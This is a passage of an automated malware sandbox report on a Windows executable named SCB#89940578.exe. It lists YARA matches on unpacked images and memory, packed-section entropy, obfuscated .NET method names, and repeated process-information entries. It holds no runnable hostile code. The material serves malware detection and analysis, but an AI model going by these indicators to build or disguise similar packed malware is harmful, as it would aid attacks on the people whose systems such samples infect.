Source: Yara match File source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
Source: C:\Users\user\Desktop\SCB#89940578.exe Code function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
Source: SCB#89940578.exe Static PE information: section name: .text entropy: 7.959447927229037
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, KK8HF5OV0PrvkrfPAW.cs High entropy of concatenated method names: 'ufDS7gIt9lVwV841YvS', 'Mhj20tI17NjEj8rCx75', 'UI7BoP4J8A', 'Qc8BHQBEbZ', 'ESsBUgERTR', 'b7b8e7IDW0XCclnfoWR', 'pLAGOTIk3pmHsjKCvfW'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, l5Me6QnMTckMyms01E.cs High entropy of concatenated method names: 'GMMMPVLFau', 'IbrMkvsvqc', 'jiFM0nWY9w', 'GGdMn8lVHt', 'jTbMWSZZXV', 'SRcMdWrWnw', 'wgYM91Tclk', 'PQyMo4cylr', 'UQXMH1uOZa', 'OlGMUBs9H0'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, juoagBsKAnhO29XXUYd.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gTAURV8wrb', 'qyEUV1YLbG', 'ycUUjGL4OQ', 'V4vUSTg1Th', 'rFGUa7PfHa', 'mFDUC9ybEY', 'h4kUDPWaRv'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, HFCf2gSPskZCZYx2in.cs High entropy of concatenated method names: 'k1S9q0pEAS', 'CYT9yaTZSP', 'ToString', 'G6q9GLQ2yW', 'aYV9upXG1n', 'xHh9MXyrru', 'STm9Q8RQ1R', 'U4o9Bb1wGq', 'gwq9Ewcxmw', 'sPW9ZH2fcZ'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs High entropy of concatenated method names: 'cjCuRirHxc', 'LLYuVVJDLu', 'SUguj6ox60', 'nVmuSlT0p6', 'Ctuua8miw3', 'B9ruCxFfdv', 'UShuD8fOLO', 'i7Zu11YRdX', 'kSOub2INuJ', 'dmpuJ019so'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, P6ZjqJ3swucoCPdYU1.cs High entropy of concatenated method names: 'AMoQhHpXl0', 'lVyQvrqRvM', 'dCQMfsBpWq', 'dqvMlu2gwr', 'vNLMpgPXNC', 'hrIMNt0mq3', 'fIPM51X0e4', 'AklM25R0ai', 'CXeMem2D65', 'PIhMtq0T5d'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, bomrjQeeRO7MjCq9JL.cs High entropy of concatenated method names: 'Bx1EL81YBC', 'hdvEIsZQt8', 'CdEEAQpET8', 'CgaEPMTC8f', 'GJ0EhUfmPw', 'ob8EkUpQDd', 'c9TEvMSaBD', 'IKZE0UpahS', 'fsEEnCrFrY', 'cHJE350Owh'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, WfRbqtROjKsisi9C2c.cs High entropy of concatenated method names: 'jNDWt67Piv', 'TMeWxe5oY8', 'B01WRoUl6q', 'n8NWVtkK3C', 'mAZWOnkmTC', 'IGJWfrgwQ4', 'Vq4Wl126G0', 'z7FWpmEkRo', 'aByWN1ENH6', 'RtGW5Lk4KI'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, QmlKtsm8sb4NYGqwub.cs High entropy of concatenated method names: 'EU5BTrC1VM', 'rifBuvf6H5', 'RitBQiPg01', 'xPJBElHAQa', 'TFcBZ0GMTU', 'Y9GQaWwlPH', 'LWTQCdYIJG', 'Xh1QD38Fbq', 'ge3Q12vKk1', 'OX4QbLmKUO'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, LTk0Go7k75hJh3fWMD.cs High entropy of concatenated method names: 'xrlsEk0ivW', 'PlAsZKcCUF', 'hMTsqckMym', 'b01syEx6Zj', 'AdYsWU16ml', 'ctssd8sb4N', 'fejxXoucjTS8gbwDkE', 'ChtqQcRkh51Owi4r9a', 'jcgssKuCwF', 'UdqsKgWQvn'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, EEsydkCYx57eeOBB6N.cs High entropy of concatenated method names: 'YR691wgNFF', 'ECn9J1RxTh', 'VrZow3O1CQ', 'vvMosJQqAs', 'PcR9imLeqp', 'STl9x2k4vG', 'kp696WwSOw', 'b0g9RSJ394', 'Thq9VBO6NX', 'fPI9j7AmLK'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, OFNmdb1Z9H5cTqygQe.cs High entropy of concatenated method names: 'moIoGPs5dx', 'NmGoul4j2M', 'ciMoMkPcrC', 'PjLoQYrIoJ', 'zBdoBJpVIr', 'u4WoEKAILs', 'COhoZxjXyK', 'Pj0oFXisww', 'DUYoqclf4G', 'xnooyx9l8G'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, wwHVEEjpM51biTRAEV.cs High entropy of concatenated method names: 'ToString', 'bDpdiaM5yT', 'g4sdOVyhM2', 'nDUdfQXbgL', 'gEWdlsRIdh', 'btwdp6tIeO', 'GBfdNpK2vV', 'SeJd5nHKla', 'iCGd2aZ2ge', 'QAFdejksim'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, dDd5a9goxCsUjXNo8Z.cs High entropy of concatenated method names: 'J03A5QJ8s', 'ylmPtmKGw', 'ET4kqWpyh', 'wFevCUmXi', 'ln8nOKiun', 'jWT3jqaSU', 'nB3JIunmCehlySBBjg', 'xKTLf7qXsk1FmSg90R', 'f3ocJbEwcGphOLjKmv', 'Xyqo0LrfG'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, aAvuH1Zy2CffGkLMu1.cs High entropy of concatenated method names: 'lY8KTuG7oE', 'II1KGhN9E0', 'u4gKuieHTc', 'hsIKMvI9FH', 'CrPKQnoxUD', 'PUtKBl7roc', 'NYSKEA9mnT', 'RuTKZ4bVbZ', 'YB9KF4T8H1', 'PT9KqOoH5a'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, KhgswbJRLEXpkhV9SF.cs High entropy of concatenated method names: 'FfbHstjnVN', 'FEGHK8mOsD', 'lo1H778CcT', 'lw2HGgjA2t', 'RuBHuPkCcQ', 'GXMHQGTQNH', 'GjWHB9HBEH', 'DTxoDbSb8Y', 'r7Zo103HmY', 'ncqobCI0PJ'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, RRfmNsut01lROUp1Bc.cs High entropy of concatenated method names: 'Dispose', 'RObsb2aLNL', 'vDGgONmm0m', 'r8XddF9kFg', 'MiFsJNmdbZ', 'qH5szcTqyg', 'ProcessDialogKey', 'hedgwaT2vo', 'OTlgsXEGhe', 'jecgg5hgsw'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, K0FH4RswvYbcRDHFRPs.cs High entropy of concatenated method names: 'GjFHLBcm14', 'AIjHIULV0g', 'lFHHASUMSI', 'nGCHPmZg4P', 'GRFHhllS74', 'FSrHk00eHV', 'qg7HviNEQr', 'iS7H00Wak1', 'qDTHnPdSyV', 'mdsH3ueRU6'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, Y6PglN5RDX6AyO2AUc.cs High entropy of concatenated method names: 'jkAEGGdER2', 'Nt9EMt2UOD', 'HWgEB0KLOv', 'JjfBJoJdqG', 'PYEBzPA2up', 'qCcEwaq19n', 'pl4Esk8kp1', 'NDVEg0NfrM', 'HfmEKIcHOf', 'igiE7uSXS1'
Source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, HP8UD46YAwT2bhahTv.cs High entropy of concatenated method names: 'OLWr0B290C', 'jHYrnOAoJZ', 'Hs7rmpTI3e', 'wQwrOPhHDh', 'JoSrlmn8gU', 'E6FrpFQqn6', 'Dd1r5tT6iT', 'UKEr2GNwaV', 'D9VrthhxPs', 'MPprit71jq'
Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, vpednoN8EZgsJ4TDwx.cs High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, KK8HF5OV0PrvkrfPAW.cs High entropy of concatenated method names: 'ufDS7gIt9lVwV841YvS', 'Mhj20tI17NjEj8rCx75', 'UI7BoP4J8A', 'Qc8BHQBEbZ', 'ESsBUgERTR', 'b7b8e7IDW0XCclnfoWR', 'pLAGOTIk3pmHsjKCvfW'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, l5Me6QnMTckMyms01E.cs High entropy of concatenated method names: 'GMMMPVLFau', 'IbrMkvsvqc', 'jiFM0nWY9w', 'GGdMn8lVHt', 'jTbMWSZZXV', 'SRcMdWrWnw', 'wgYM91Tclk', 'PQyMo4cylr', 'UQXMH1uOZa', 'OlGMUBs9H0'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, juoagBsKAnhO29XXUYd.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gTAURV8wrb', 'qyEUV1YLbG', 'ycUUjGL4OQ', 'V4vUSTg1Th', 'rFGUa7PfHa', 'mFDUC9ybEY', 'h4kUDPWaRv'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, HFCf2gSPskZCZYx2in.cs High entropy of concatenated method names: 'k1S9q0pEAS', 'CYT9yaTZSP', 'ToString', 'G6q9GLQ2yW', 'aYV9upXG1n', 'xHh9MXyrru', 'STm9Q8RQ1R', 'U4o9Bb1wGq', 'gwq9Ewcxmw', 'sPW9ZH2fcZ'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs High entropy of concatenated method names: 'cjCuRirHxc', 'LLYuVVJDLu', 'SUguj6ox60', 'nVmuSlT0p6', 'Ctuua8miw3', 'B9ruCxFfdv', 'UShuD8fOLO', 'i7Zu11YRdX', 'kSOub2INuJ', 'dmpuJ019so'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, P6ZjqJ3swucoCPdYU1.cs High entropy of concatenated method names: 'AMoQhHpXl0', 'lVyQvrqRvM', 'dCQMfsBpWq', 'dqvMlu2gwr', 'vNLMpgPXNC', 'hrIMNt0mq3', 'fIPM51X0e4', 'AklM25R0ai', 'CXeMem2D65', 'PIhMtq0T5d'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, bomrjQeeRO7MjCq9JL.cs High entropy of concatenated method names: 'Bx1EL81YBC', 'hdvEIsZQt8', 'CdEEAQpET8', 'CgaEPMTC8f', 'GJ0EhUfmPw', 'ob8EkUpQDd', 'c9TEvMSaBD', 'IKZE0UpahS', 'fsEEnCrFrY', 'cHJE350Owh'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, WfRbqtROjKsisi9C2c.cs High entropy of concatenated method names: 'jNDWt67Piv', 'TMeWxe5oY8', 'B01WRoUl6q', 'n8NWVtkK3C', 'mAZWOnkmTC', 'IGJWfrgwQ4', 'Vq4Wl126G0', 'z7FWpmEkRo', 'aByWN1ENH6', 'RtGW5Lk4KI'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, QmlKtsm8sb4NYGqwub.cs High entropy of concatenated method names: 'EU5BTrC1VM', 'rifBuvf6H5', 'RitBQiPg01', 'xPJBElHAQa', 'TFcBZ0GMTU', 'Y9GQaWwlPH', 'LWTQCdYIJG', 'Xh1QD38Fbq', 'ge3Q12vKk1', 'OX4QbLmKUO'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, LTk0Go7k75hJh3fWMD.cs High entropy of concatenated method names: 'xrlsEk0ivW', 'PlAsZKcCUF', 'hMTsqckMym', 'b01syEx6Zj', 'AdYsWU16ml', 'ctssd8sb4N', 'fejxXoucjTS8gbwDkE', 'ChtqQcRkh51Owi4r9a', 'jcgssKuCwF', 'UdqsKgWQvn'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, EEsydkCYx57eeOBB6N.cs High entropy of concatenated method names: 'YR691wgNFF', 'ECn9J1RxTh', 'VrZow3O1CQ', 'vvMosJQqAs', 'PcR9imLeqp', 'STl9x2k4vG', 'kp696WwSOw', 'b0g9RSJ394', 'Thq9VBO6NX', 'fPI9j7AmLK'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, OFNmdb1Z9H5cTqygQe.cs High entropy of concatenated method names: 'moIoGPs5dx', 'NmGoul4j2M', 'ciMoMkPcrC', 'PjLoQYrIoJ', 'zBdoBJpVIr', 'u4WoEKAILs', 'COhoZxjXyK', 'Pj0oFXisww', 'DUYoqclf4G', 'xnooyx9l8G'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, wwHVEEjpM51biTRAEV.cs High entropy of concatenated method names: 'ToString', 'bDpdiaM5yT', 'g4sdOVyhM2', 'nDUdfQXbgL', 'gEWdlsRIdh', 'btwdp6tIeO', 'GBfdNpK2vV', 'SeJd5nHKla', 'iCGd2aZ2ge', 'QAFdejksim'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, dDd5a9goxCsUjXNo8Z.cs High entropy of concatenated method names: 'J03A5QJ8s', 'ylmPtmKGw', 'ET4kqWpyh', 'wFevCUmXi', 'ln8nOKiun', 'jWT3jqaSU', 'nB3JIunmCehlySBBjg', 'xKTLf7qXsk1FmSg90R', 'f3ocJbEwcGphOLjKmv', 'Xyqo0LrfG'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, aAvuH1Zy2CffGkLMu1.cs High entropy of concatenated method names: 'lY8KTuG7oE', 'II1KGhN9E0', 'u4gKuieHTc', 'hsIKMvI9FH', 'CrPKQnoxUD', 'PUtKBl7roc', 'NYSKEA9mnT', 'RuTKZ4bVbZ', 'YB9KF4T8H1', 'PT9KqOoH5a'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, KhgswbJRLEXpkhV9SF.cs High entropy of concatenated method names: 'FfbHstjnVN', 'FEGHK8mOsD', 'lo1H778CcT', 'lw2HGgjA2t', 'RuBHuPkCcQ', 'GXMHQGTQNH', 'GjWHB9HBEH', 'DTxoDbSb8Y', 'r7Zo103HmY', 'ncqobCI0PJ'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, RRfmNsut01lROUp1Bc.cs High entropy of concatenated method names: 'Dispose', 'RObsb2aLNL', 'vDGgONmm0m', 'r8XddF9kFg', 'MiFsJNmdbZ', 'qH5szcTqyg', 'ProcessDialogKey', 'hedgwaT2vo', 'OTlgsXEGhe', 'jecgg5hgsw'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, K0FH4RswvYbcRDHFRPs.cs High entropy of concatenated method names: 'GjFHLBcm14', 'AIjHIULV0g', 'lFHHASUMSI', 'nGCHPmZg4P', 'GRFHhllS74', 'FSrHk00eHV', 'qg7HviNEQr', 'iS7H00Wak1', 'qDTHnPdSyV', 'mdsH3ueRU6'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, Y6PglN5RDX6AyO2AUc.cs High entropy of concatenated method names: 'jkAEGGdER2', 'Nt9EMt2UOD', 'HWgEB0KLOv', 'JjfBJoJdqG', 'PYEBzPA2up', 'qCcEwaq19n', 'pl4Esk8kp1', 'NDVEg0NfrM', 'HfmEKIcHOf', 'igiE7uSXS1'
Source: 0.2.SCB#89940578.exe.9fd0000.11.raw.unpack, HP8UD46YAwT2bhahTv.cs High entropy of concatenated method names: 'OLWr0B290C', 'jHYrnOAoJZ', 'Hs7rmpTI3e', 'wQwrOPhHDh', 'JoSrlmn8gU', 'E6FrpFQqn6', 'Dd1r5tT6iT', 'UKEr2GNwaV', 'D9VrthhxPs', 'MPprit71jq'
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
Source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, vpednoN8EZgsJ4TDwx.cs High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, KK8HF5OV0PrvkrfPAW.cs High entropy of concatenated method names: 'ufDS7gIt9lVwV841YvS', 'Mhj20tI17NjEj8rCx75', 'UI7BoP4J8A', 'Qc8BHQBEbZ', 'ESsBUgERTR', 'b7b8e7IDW0XCclnfoWR', 'pLAGOTIk3pmHsjKCvfW'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, l5Me6QnMTckMyms01E.cs High entropy of concatenated method names: 'GMMMPVLFau', 'IbrMkvsvqc', 'jiFM0nWY9w', 'GGdMn8lVHt', 'jTbMWSZZXV', 'SRcMdWrWnw', 'wgYM91Tclk', 'PQyMo4cylr', 'UQXMH1uOZa', 'OlGMUBs9H0'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, juoagBsKAnhO29XXUYd.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gTAURV8wrb', 'qyEUV1YLbG', 'ycUUjGL4OQ', 'V4vUSTg1Th', 'rFGUa7PfHa', 'mFDUC9ybEY', 'h4kUDPWaRv'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, HFCf2gSPskZCZYx2in.cs High entropy of concatenated method names: 'k1S9q0pEAS', 'CYT9yaTZSP', 'ToString', 'G6q9GLQ2yW', 'aYV9upXG1n', 'xHh9MXyrru', 'STm9Q8RQ1R', 'U4o9Bb1wGq', 'gwq9Ewcxmw', 'sPW9ZH2fcZ'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, Ik0ivW0xlAKcCUFkH9.cs High entropy of concatenated method names: 'cjCuRirHxc', 'LLYuVVJDLu', 'SUguj6ox60', 'nVmuSlT0p6', 'Ctuua8miw3', 'B9ruCxFfdv', 'UShuD8fOLO', 'i7Zu11YRdX', 'kSOub2INuJ', 'dmpuJ019so'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, P6ZjqJ3swucoCPdYU1.cs High entropy of concatenated method names: 'AMoQhHpXl0', 'lVyQvrqRvM', 'dCQMfsBpWq', 'dqvMlu2gwr', 'vNLMpgPXNC', 'hrIMNt0mq3', 'fIPM51X0e4', 'AklM25R0ai', 'CXeMem2D65', 'PIhMtq0T5d'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, bomrjQeeRO7MjCq9JL.cs High entropy of concatenated method names: 'Bx1EL81YBC', 'hdvEIsZQt8', 'CdEEAQpET8', 'CgaEPMTC8f', 'GJ0EhUfmPw', 'ob8EkUpQDd', 'c9TEvMSaBD', 'IKZE0UpahS', 'fsEEnCrFrY', 'cHJE350Owh'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, WfRbqtROjKsisi9C2c.cs High entropy of concatenated method names: 'jNDWt67Piv', 'TMeWxe5oY8', 'B01WRoUl6q', 'n8NWVtkK3C', 'mAZWOnkmTC', 'IGJWfrgwQ4', 'Vq4Wl126G0', 'z7FWpmEkRo', 'aByWN1ENH6', 'RtGW5Lk4KI'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, QmlKtsm8sb4NYGqwub.cs High entropy of concatenated method names: 'EU5BTrC1VM', 'rifBuvf6H5', 'RitBQiPg01', 'xPJBElHAQa', 'TFcBZ0GMTU', 'Y9GQaWwlPH', 'LWTQCdYIJG', 'Xh1QD38Fbq', 'ge3Q12vKk1', 'OX4QbLmKUO'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, LTk0Go7k75hJh3fWMD.cs High entropy of concatenated method names: 'xrlsEk0ivW', 'PlAsZKcCUF', 'hMTsqckMym', 'b01syEx6Zj', 'AdYsWU16ml', 'ctssd8sb4N', 'fejxXoucjTS8gbwDkE', 'ChtqQcRkh51Owi4r9a', 'jcgssKuCwF', 'UdqsKgWQvn'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, EEsydkCYx57eeOBB6N.cs High entropy of concatenated method names: 'YR691wgNFF', 'ECn9J1RxTh', 'VrZow3O1CQ', 'vvMosJQqAs', 'PcR9imLeqp', 'STl9x2k4vG', 'kp696WwSOw', 'b0g9RSJ394', 'Thq9VBO6NX', 'fPI9j7AmLK'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, OFNmdb1Z9H5cTqygQe.cs High entropy of concatenated method names: 'moIoGPs5dx', 'NmGoul4j2M', 'ciMoMkPcrC', 'PjLoQYrIoJ', 'zBdoBJpVIr', 'u4WoEKAILs', 'COhoZxjXyK', 'Pj0oFXisww', 'DUYoqclf4G', 'xnooyx9l8G'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, wwHVEEjpM51biTRAEV.cs High entropy of concatenated method names: 'ToString', 'bDpdiaM5yT', 'g4sdOVyhM2', 'nDUdfQXbgL', 'gEWdlsRIdh', 'btwdp6tIeO', 'GBfdNpK2vV', 'SeJd5nHKla', 'iCGd2aZ2ge', 'QAFdejksim'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, dDd5a9goxCsUjXNo8Z.cs High entropy of concatenated method names: 'J03A5QJ8s', 'ylmPtmKGw', 'ET4kqWpyh', 'wFevCUmXi', 'ln8nOKiun', 'jWT3jqaSU', 'nB3JIunmCehlySBBjg', 'xKTLf7qXsk1FmSg90R', 'f3ocJbEwcGphOLjKmv', 'Xyqo0LrfG'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, aAvuH1Zy2CffGkLMu1.cs High entropy of concatenated method names: 'lY8KTuG7oE', 'II1KGhN9E0', 'u4gKuieHTc', 'hsIKMvI9FH', 'CrPKQnoxUD', 'PUtKBl7roc', 'NYSKEA9mnT', 'RuTKZ4bVbZ', 'YB9KF4T8H1', 'PT9KqOoH5a'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, KhgswbJRLEXpkhV9SF.cs High entropy of concatenated method names: 'FfbHstjnVN', 'FEGHK8mOsD', 'lo1H778CcT', 'lw2HGgjA2t', 'RuBHuPkCcQ', 'GXMHQGTQNH', 'GjWHB9HBEH', 'DTxoDbSb8Y', 'r7Zo103HmY', 'ncqobCI0PJ'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, RRfmNsut01lROUp1Bc.cs High entropy of concatenated method names: 'Dispose', 'RObsb2aLNL', 'vDGgONmm0m', 'r8XddF9kFg', 'MiFsJNmdbZ', 'qH5szcTqyg', 'ProcessDialogKey', 'hedgwaT2vo', 'OTlgsXEGhe', 'jecgg5hgsw'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, K0FH4RswvYbcRDHFRPs.cs High entropy of concatenated method names: 'GjFHLBcm14', 'AIjHIULV0g', 'lFHHASUMSI', 'nGCHPmZg4P', 'GRFHhllS74', 'FSrHk00eHV', 'qg7HviNEQr', 'iS7H00Wak1', 'qDTHnPdSyV', 'mdsH3ueRU6'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, Y6PglN5RDX6AyO2AUc.cs High entropy of concatenated method names: 'jkAEGGdER2', 'Nt9EMt2UOD', 'HWgEB0KLOv', 'JjfBJoJdqG', 'PYEBzPA2up', 'qCcEwaq19n', 'pl4Esk8kp1', 'NDVEg0NfrM', 'HfmEKIcHOf', 'igiE7uSXS1'
Source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, HP8UD46YAwT2bhahTv.cs High entropy of concatenated method names: 'OLWr0B290C', 'jHYrnOAoJZ', 'Hs7rmpTI3e', 'wQwrOPhHDh', 'JoSrlmn8gU', 'E6FrpFQqn6', 'Dd1r5tT6iT', 'UKEr2GNwaV', 'D9VrthhxPs', 'MPprit71jq'
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
